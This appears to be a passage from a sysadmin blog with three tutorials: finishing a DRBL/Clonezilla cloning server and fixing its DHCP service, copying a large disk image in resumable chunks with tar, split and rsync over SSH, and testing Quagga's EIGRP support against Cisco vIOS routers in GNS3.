We do not need to provide Internet to clients so type n.

3.14 Firewall Rules


Picture 18 - Changing Firewall Rules

Press Enter or type y to let DRBL server to change firewall rules.

4. Start Clonezilla Server
The scripts automatically starts a script dcs which starts Clonezilla.

4.1 Client Selection


Picture 19 - Selecting Clients

We can either select all clients or an individual client based on its IP or MAC address. Select the first option - All .

4.2 Start Clonezilla Mode


Picture 20 - Starting Clonezilla Mode

Select an option clonezilla-start to start clonezilla mode.

4.3 Beginner Mode


Picture 21 - Beginner Mode

Select an option Beginner which accepts the default options.

4.4 Select-in-Client Clonezilla Mode


Picture 22 - Select-in-Client Clonezilla Mode

Select an option select-in-client. This option allows you to select either to restore or save the image on client.

4.5 Clonezilla Advanced Extra Parameters


Picture 23 - Clonezilla Advanced Extra Parameters

Select an option -y1 default Clonezilla.

4.6 Shutdown Clients


Picture 24 - Shutdown Clients When Cloning is Finished

Select an option -p poweroff. Clients automatically power off once cloning is finished. When dcs script finishes, you can see the following command in your terminal window.

drbl-ocs -b -l en_US.UTF-8 -y1 -p poweroff select_in_client

-b - run program in batch mode, i.e without any prompt
-l - language en-US.UTF-8
-y1 - clonezilla server as restore server
-p - shutdown client when cloning/restoring finishes
select_in_client - client chooses either to clone or restore

You can put the command inside the script /etc/init/clone.conf to start Clonezilla automatically after boot. To clone clients using multicast in order to speed up cloning process, use the following command.

drbl-ocs -b -g auto -e1 auto -e2 -x -r -j2 -sc0 -p poweroff --time-to-wait 30 -l en_US.UTF-8 startdisk multicast_restore core_linux sda

All options are explained here.

5. Troubleshooting

Here are the problems I noticed during writing the tutorial.

5.1 Client Does Not Get IP Address

Check if DHCP service is running with the command:

$ ps -ef | grep dhcpd | grep -v grep


Picture 25 - Checking DHCP Service

If you cannot see the output above, DHCP service is not running. Check the service status with the command:

$ systemctl status isc-dhcp-server


Picture 26 - DHCP Service Disabled and Not Active

We can see that DHCP service is disabled and not active. We can enable it with the command:

$ systemctl enable isc-dhcp-server


Picture 27 - DHCP Service Enabled But Not Active

DHCP service is enabled but not active. Activate the service with the command:

$ systemctl start isc-dhcp-server


Picture 28 - DHCP Service Enabled and Active

You can check DHCP messages in /var/log/syslog file.


Picture 29 - Obtaining IP Address for Client

Obtaining IP address for client with a MAC address 09:00:27:93:43:bb via the interface enp0s3.



Using Rsync to Copy Files From SSH Server

Recently I have come through an interesting problem. I needed to download a raw copy of the HDD image located on a remote server (about 180GB) connected via 1 Mbps link. Network connection dropped frequently so the requirement was to reestablish connection automatically, without my intervention.

Definition of Terms
Server - a remote computer with an IP address which contains a raw copy of the HDD image - a file /root/ubuntu.iso.
Client - a local computer that copies a raw copy of the HDD image from the server.

Below is my how-to which helped me to fulfill a task. I hope it might be useful to you.

1. Create Multiple Archive Files
The idea is to create a compressed archive file and to split it to multiple sequential chunks in order to make transfer of files less depended on network outages due to an unreliable link.

$ tar cvf - ubuntu.iso | gzip -9 - | split -b 10M -d - ./disk/ubuntu.tar.gz.

The command tar creates a tar archive from a file ubuntu.iso and send it to a standard output instead to the file. The command gzip compress everything from a standard input using the best compression ratio (parameter -9) and send it to the standard output. The command split reads from the standard input and split one large archive file to multiple 10M sequential pieces with numbered suffix (parameter -d). Chunks are saved into the directory disk.

We will put a tar command to the script  and a secure copy command scp helps us to copy a script to a remote server into to the root directory.

$ scp -rv root@

Login to the server using ssh secure shell and start the script with a command below. The command nohup ensures that script keeps running in the background  also in case SSH session is dropped.

# nohup bash ./script &

2. Generate Private and Public RSA Key and Copy Public Key to Server
First we generate  public and private keys on a client with ssh-keygen command.

$ ssh-keygen -t rsa -P ""

-t type of key to create
-P passphrase (blank).

The command generates a public key and a private key id_rsa and saves the both keys into a directory ~/.ssh. Let's copy our public key to a remote server with the ssh-copy-id command.

$ ssh-copy-id -i ~/.ssh/ root@

-i path to a public key on a client

Now we should be able to connect to a remote server with ssh using a public key authentication (without entering a password).

3. Copy Files with Rsync
Rsync is a command for synchronizing and copying directories both locally and remotely. We will use it for downloading our archive chunk files. For us copying files with rsync command is a preferable copy method comparing to copying chunks with scp command. The command scp overwrites already copied files on a client when the copying is restarted (in order to download the rest of files e.g. after a network outage).

Rsync works differently. For instance when a file is only partially downloaded  during a network outage, the command rsync started with a parameter --partially ensures that a file is kept on the disk. A parameter --append ensures that rsync downloads the rest of the file after network connection is restored.

Here is a script that we are going to run on the client. The script keeps copying files with rsync command  while a return value of the rsync command is not zero.

Rsync options:
-a append data onto shorter files
-e specify the remote shell to use (ssh)
--partial keep partially transferred files
--progress show progress during file transfer
-v verbose

4. Merge and Extract Downloaded Files
The last step consists of merging chunks located in a directory files on the client using the cat command. The output from the cat is sent to the tar command which reads data from the standard input and extracts and decompress the archive file. As a result a file ubuntu.iso is created.

$ cat ./files/ubuntu.tar.gz.* | tar zxvf -


Quagga Routing Software with EIGRP Support

In May 2013, Cisco opened its proprietary EIGRP protocol and released an informational RFC 7868 - Cisco's Enhanced Interior Gateway Routing Protocol (EIGRP). It gives other vendors an opportunity to implement EIGRP protocol into their devices. A group students led by an assistant professor and Cisco CCIE Peter Paluch who is an instructor trainer at the Faculty of Management Science and Informatics, University of Zilina, Slovakia implemented EIGRP support into Quagga routing software.

The goal of this tutorial is to provide a VMware vmdk disk with installed Linux Core and Quagga which supports Cisco EIGRP protocol. The image can be used to test compatibility between EIGRP configured on native Cisco devices and an implementation of EIGRP daemon in Quagga . I also share my findings about issues that I have noticed during my tests.

Here you can download Linux Core vmdk disk with installed Quagga 0.99.24-rc1 which supports EIGRP.

How did I create Quagga Qemu Image with EIGRP Support
I installed Linux Core 7.2 to Qemu virtual machine and remastered Core for sending output to a serial port according to this tutorial. I download Quagga version which supports EIGRP from github and I installed it from source. Afterwards I created Linux Core Quagga extension. I did not submit Quagga extension to Tinycore repository for following reasons. Firstly, EIGRP daemon has not been yet merged to the main branch of Quagga. A current Quagga version with EIGRP support on released on github is based on the old Quagga version 0.99.24-rc1. Secondly, Zebra daemon responsible for putting routes into Linux routing table occasionally does not install received routes although routes are presented in EIGRP topology table.

Finally I installed Core extensions such as tcpdump, ipv6, netfilter etc. and enabled forwarding IPv4 and IPv6 packets between interfaces. The list of installed extensions can be checked with the command:

$ ls /mnt/sda1/tce/optional/

Routing daemons are started during the boot of Core Linux. They are placed in a start-up file /opt/boot/ Comment a line for a particular routing daemon if you do not need it. The list of running daemons and ports are shown in the file below.

root@box:/home/tc# netstat -atpn | grep > ports.txt

Testing Topology Description
The are three routers are running inside GNS3 project. A router eigrp-core-1 x86-64 is Linux Core 7.2 with Quagga compiled for EIGRP support. Routers vIOS-1 and v-IOS-2 are Cisco Virtual IOS L3 routers. The Qemu emulator is used as a hypervisor for all routers.


Picture 1 - Network Topology

The list of used software is available here.

To configure EIGRP, telnet to eigrp daemon running on port 2609. Password configured in the EIGRP configuration file /usr/local/etc/quagga/eigrpd.conf is set to quagga.

tc@box:~$ telnet localhost 2609

Configuration files for router are eigrp-core-1.txt, vIOS-1, vIOS-2.txt.

To save Quagga and vIOS routers' configuration, type the write command from privileged exec mode. Each routing daemon has it own file.

To save configuration change stored inside a configuration file own by a particular routing daemon, run a script below. The script is responsible for saving all files located in a directory /usr/local/etc/quagga. This is a requirement of Linux Core .

tc@box:~$ /usr/bin/ -b

Note: To save an another file or a directory, simply add the path to a file /opt/.filetool.lst and run the command /usr/bin/ -b.


1. EIGRP configuration is not correctly implemented in Quagga Vtysh shell
Even the command router eigrp is presented in the configuration mode of Quagga vtysh, the EIGRP daemon configuration is not properly implemented in vtysh. Here is the prove.

2. Zebra does not install received routes
Sometimes Zebra does not install received routes into a Core Linux routing table. However routes are presented in EIGRP Topology Table.


Picture 2 - Missing Received Routes in Linux Routing Table

The picture below proves that routes are presented in EIGRP Topology Table.


Picture 3 - Routes are Presented in EIGRP Topology Table

I noticed this issue is always happening when EIGRP daemon is started right after Zebra daemon during the Core boot. As a workaround I postponed starting EIGRP daemon about 20 seconds in /opt/ But sometimes routes are not inserted to a Linux routing table. Below are EIGRP debugs captured on vIOS-1 router and captured EIGRP traffic on Linux Core. The router vIOS-2 is switched off but a network is presented in a routing table of vIOS-1 as interface Gi0/1 is up/up state due to using an Qemu emulator.

a) EIGRP debugs on vIOS-1 when routes are installed into Linux routing table

In this case, Zebra successfully installs received routes in to to Core Linux routing table. Notice that once EIGRP neighbor adjacency between Quagga ( and vIOS-1 ( is established, Quagga restart EIGRP neighbor adjacency for unknown reason. After restart, adjacency is again established between EIGRP peers. I made about 20 tests and I realized that routes are inserted to Linux routing table only when Quagga restarts EIGRP neighbor adjacency.

Click on the command to show captured debug on vIOS-1 when received routes are installed in a Linux Core routing table.

vIOS-1# debug ip eigrp
vIOS-1# debug ip eigrp notifications
vIOS-1# debug ip eigrp neigbour

b) EIGRP debugs on vIOS-1 when routes are not installed into Linux routing table

vIOS-1# debug ip eigrp unsuccesfull
vIOS-1# debug ip eigrp notifications
vIOS-1# debug ip eigrp neighbour

EIGRP support in  Quagga routing software is still in development. They are some the bugs presented but they will be resolved in the future. Thanks to great effort of Slovak students, EIGRP in Linux have become a reality.